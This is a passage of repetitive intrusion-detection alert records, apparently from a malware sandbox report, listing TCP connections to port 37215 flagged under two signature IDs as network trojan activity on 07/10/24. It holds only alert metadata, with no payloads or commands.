                  Source Port:49164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.385173
                  SID:2829579
                  Source Port:42746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.805928
                  SID:2835222
                  Source Port:37242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2829579
                  Source Port:50840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.389653
                  SID:2835222
                  Source Port:60240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.393644
                  SID:2829579
                  Source Port:38392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.865428
                  SID:2829579
                  Source Port:60386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.915755
                  SID:2835222
                  Source Port:40472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.960962
                  SID:2835222
                  Source Port:52594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.598591
                  SID:2835222
                  Source Port:59452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.772069
                  SID:2829579
                  Source Port:51730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.357812
                  SID:2835222
                  Source Port:41596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.453697
                  SID:2829579
                  Source Port:35404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.453868
                  SID:2835222
                  Source Port:50416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.939278
                  SID:2829579
                  Source Port:44250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.217232
                  SID:2829579
                  Source Port:50998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.397639
                  SID:2835222
                  Source Port:59634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.136895
                  SID:2829579
                  Source Port:56594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.815685
                  SID:2835222
                  Source Port:32984
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.519002
                  SID:2829579
                  Source Port:44058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.803775
                  SID:2829579
                  Source Port:47626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.815899
                  SID:2829579
                  Source Port:48700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.574763
                  SID:2829579
                  Source Port:59674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376738
                  SID:2829579
                  Source Port:50962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.527046
                  SID:2835222
                  Source Port:53530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.039124
                  SID:2829579
                  Source Port:34498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.728066
                  SID:2829579
                  Source Port:35764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.623389
                  SID:2829579
                  Source Port:33352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.503396
                  SID:2829579
                  Source Port:35482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.569850
                  SID:2835222
                  Source Port:39250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.812870
                  SID:2835222
                  Source Port:42346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.594017
                  SID:2829579
                  Source Port:33902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.975524
                  SID:2835222
                  Source Port:51520
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.834313
                  SID:2835222
                  Source Port:47460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.553942
                  SID:2835222
                  Source Port:55434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.498164
                  SID:2829579
                  Source Port:37822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.605186
                  SID:2835222
                  Source Port:38466
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.479456
                  SID:2835222
                  Source Port:43462
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633431
                  SID:2835222
                  Source Port:59138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.768193
                  SID:2829579
                  Source Port:59586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.165980
                  SID:2829579
                  Source Port:42756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.579730
                  SID:2835222
                  Source Port:54334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.168478
                  SID:2835222
                  Source Port:43796
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.374811
                  SID:2829579
                  Source Port:58408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.435452
                  SID:2829579
                  Source Port:59518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.780155
                  SID:2829579
                  Source Port:57072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.676177
                  SID:2829579
                  Source Port:53510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.755457
                  SID:2835222
                  Source Port:54478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.209261
                  SID:2835222
                  Source Port:59958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.897844
                  SID:2829579
                  Source Port:54154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.785606
                  SID:2835222
                  Source Port:53162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.408073
                  SID:2829579
                  Source Port:36542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.949635
                  SID:2829579
                  Source Port:42684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.314456
                  SID:2829579
                  Source Port:54406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.405214
                  SID:2835222
                  Source Port:52494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.564471
                  SID:2829579
                  Source Port:33632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.228367
                  SID:2829579
                  Source Port:60116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.358827
                  SID:2829579
                  Source Port:52510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.357813
                  SID:2829579
                  Source Port:50322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.506758
                  SID:2835222
                  Source Port:51652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.701757
                  SID:2829579
                  Source Port:56592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.284664
                  SID:2835222
                  Source Port:49840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.931064
                  SID:2835222
                  Source Port:33442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.611968
                  SID:2829579
                  Source Port:37146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.824955
                  SID:2835222
                  Source Port:55964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.994828
                  SID:2835222
                  Source Port:51036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.240926
                  SID:2835222
                  Source Port:47378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.837917
                  SID:2835222
                  Source Port:57444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.210999
                  SID:2835222
                  Source Port:54160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.558731
                  SID:2835222
                  Source Port:34116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.972432
                  SID:2829579
                  Source Port:58250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.481265
                  SID:2829579
                  Source Port:56250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.903866
                  SID:2835222
                  Source Port:49618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.021892
                  SID:2829579
                  Source Port:41902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.996062
                  SID:2835222
                  Source Port:41304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.871657
                  SID:2829579
                  Source Port:52952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.605527
                  SID:2835222
                  Source Port:58622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.667281
                  SID:2829579
                  Source Port:55996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.981965
                  SID:2835222
                  Source Port:57600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.787588
                  SID:2835222
                  Source Port:55472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.445959
                  SID:2829579
                  Source Port:45242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.911727
                  SID:2829579
                  Source Port:33790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.771792
                  SID:2835222
                  Source Port:56814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.206417
                  SID:2829579
                  Source Port:44554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.366648
                  SID:2835222
                  Source Port:36722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.483215
                  SID:2829579
                  Source Port:58976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.105153
                  SID:2835222
                  Source Port:57774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.550771
                  SID:2835222
                  Source Port:57044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.199825
                  SID:2829579
                  Source Port:45190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.622181
                  SID:2835222
                  Source Port:58548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384932
                  SID:2835222
                  Source Port:33276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.487811
                  SID:2835222
                  Source Port:38428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.658066
                  SID:2835222
                  Source Port:36748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.857576
                  SID:2829579
                  Source Port:49574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.763475
                  SID:2835222
                  Source Port:48150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.135511
                  SID:2829579
                  Source Port:39026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.655125
                  SID:2829579
                  Source Port:34110
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.533117
                  SID:2835222
                  Source Port:53016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.379647
                  SID:2835222
                  Source Port:49390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.663651
                  SID:2829579
                  Source Port:48632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.981659
                  SID:2829579
                  Source Port:34922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.535955
                  SID:2835222
                  Source Port:57982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.649070
                  SID:2829579
                  Source Port:46120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.851521
                  SID:2829579
                  Source Port:36132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.895681
                  SID:2835222
                  Source Port:52742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.972385
                  SID:2829579
                  Source Port:44606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.076379
                  SID:2829579
                  Source Port:56970
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.453618
                  SID:2829579
                  Source Port:48622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828285
                  SID:2829579
                  Source Port:46392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.256446
                  SID:2835222
                  Source Port:58464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.030999
                  SID:2835222
                  Source Port:43662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.849524
                  SID:2835222
                  Source Port:38474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.835000
                  SID:2829579
                  Source Port:45406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.953333
                  SID:2835222
                  Source Port:58176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532375
                  SID:2835222
                  Source Port:49994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.651125
                  SID:2829579
                  Source Port:46732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.240759
                  SID:2829579
                  Source Port:34450
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.900455
                  SID:2835222
                  Source Port:58030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.414993
                  SID:2829579
                  Source Port:48950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.411033
                  SID:2829579
                  Source Port:36798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.819532
                  SID:2835222
                  Source Port:39656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.354266
                  SID:2829579
                  Source Port:43704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.466916
                  SID:2829579
                  Source Port:36266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.930941
                  SID:2829579
                  Source Port:55416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.416774
                  SID:2829579
                  Source Port:57434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281648
                  SID:2835222
                  Source Port:38000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.846857
                  SID:2835222
                  Source Port:54028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.716431
                  SID:2829579
                  Source Port:48896
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.435310
                  SID:2835222
                  Source Port:50112
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.985938
                  SID:2835222
                  Source Port:50644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.882754
                  SID:2835222
                  Source Port:50384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.739148
                  SID:2829579
                  Source Port:43052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.453874
                  SID:2829579
                  Source Port:33786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.498164
                  SID:2835222
                  Source Port:49846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.622674
                  SID:2835222
                  Source Port:47370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.176057
                  SID:2835222
                  Source Port:39352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.821697
                  SID:2835222
                  Source Port:34720
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.339944
                  SID:2829579
                  Source Port:40700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.942664
                  SID:2829579
                  Source Port:35064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.474823
                  SID:2835222
                  Source Port:54950
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.933807
                  SID:2829579
                  Source Port:51710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.554660
                  SID:2829579
                  Source Port:38646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.959753
                  SID:2835222
                  Source Port:53310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.677011
                  SID:2829579
                  Source Port:34050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.830604
                  SID:2829579
                  Source Port:47754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.364400
                  SID:2829579
                  Source Port:49792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.847228
                  SID:2829579
                  Source Port:35076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.927813
                  SID:2829579
                  Source Port:46602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.969551
                  SID:2829579
                  Source Port:51740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.244290
                  SID:2835222
                  Source Port:49420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.489365
                  SID:2835222
                  Source Port:57048
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.366106
                  SID:2829579
                  Source Port:46542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.821091
                  SID:2835222
                  Source Port:60324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.854070
                  SID:2829579
                  Source Port:33084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.287568
                  SID:2829579
                  Source Port:38350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.781993
                  SID:2829579
                  Source Port:50116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.469878
                  SID:2835222
                  Source Port:35780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.625534
                  SID:2829579
                  Source Port:41804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.988498
                  SID:2835222
                  Source Port:51062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.816955
                  SID:2835222
                  Source Port:54070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.122406
                  SID:2829579
                  Source Port:45482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.070374
                  SID:2829579
                  Source Port:48446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.971584
                  SID:2835222
                  Source Port:45606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.792621
                  SID:2829579
                  Source Port:34124
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.012219
                  SID:2835222
                  Source Port:45296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.800070
                  SID:2835222
                  Source Port:55272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.254772
                  SID:2829579
                  Source Port:54992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.558731
                  SID:2829579
                  Source Port:49644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.941159
                  SID:2829579
                  Source Port:54964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.147329
                  SID:2835222
                  Source Port:57838
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.905165
                  SID:2835222
                  Source Port:42906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.836881
                  SID:2835222
                  Source Port:36166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.284059
                  SID:2829579
                  Source Port:53742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.208753
                  SID:2835222
                  Source Port:40604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.850693
                  SID:2835222
                  Source Port:55464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.558999
                  SID:2829579
                  Source Port:38440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.633742
                  SID:2829579
                  Source Port:35138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.947908
                  SID:2829579
                  Source Port:44182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.412174
                  SID:2829579
                  Source Port:38744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.174843
                  SID:2835222
                  Source Port:39350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.492414
                  SID:2829579
                  Source Port:49116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.189042
                  SID:2829579
                  Source Port:51644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.115720
                  SID:2829579
                  Source Port:46108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.171305
